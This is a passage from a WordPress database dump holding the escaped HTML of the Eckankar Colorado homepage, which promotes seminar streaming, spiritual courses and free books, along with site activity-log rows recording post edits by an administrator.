class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-weight: 600;\" data-font-weight=\"600\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243139,41211,'new_post_title','ECK LIGHT & SOUND TEMPLATE-In Person & Online-CONTAINS REGISTRATION | Benefit Title goes here'),(243140,41211,'new_post_id','269412'),(243141,41211,'duplicated_post_title','ECK LIGHT & SOUND TEMPLATE-In Person & Online-CONTAINS REGISTRATION | Benefit Title goes here'),(243142,41211,'duplicated_post_id','266540'),(243143,41211,'_message_key','post_duplicated'),(243144,41211,'_user_id','15'),(243145,41211,'_user_login','john-admin-96'),(243146,41211,'_user_email','nadazipought@zilch.org'),(243147,41211,'_server_remote_addr','184.96.219.x'),(243148,41211,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=ccef69b381&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(243149,41212,'post_id','269412'),(243150,41212,'post_type','mec-events'),(243151,41212,'post_title','ECK LIGHT &#038; SOUND SERVICE'),(243152,41212,'post_new_thumb_id','266160'),(243153,41212,'post_new_thumb_title','bird-sky-1'),(243154,41212,'post_meta_added','79'),(243155,41212,'_message_key','post_updated'),(243156,41212,'_user_id','15'),(243157,41212,'_user_login','john-admin-96'),(243158,41212,'_user_email','nadazipought@zilch.org'),(243159,41212,'_server_remote_addr','184.96.219.x'),(243160,41212,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269412'),(243161,41213,'post_id','7160'),(243162,41213,'post_type','page'),(243163,41213,'post_title','Home'),(243164,41213,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" 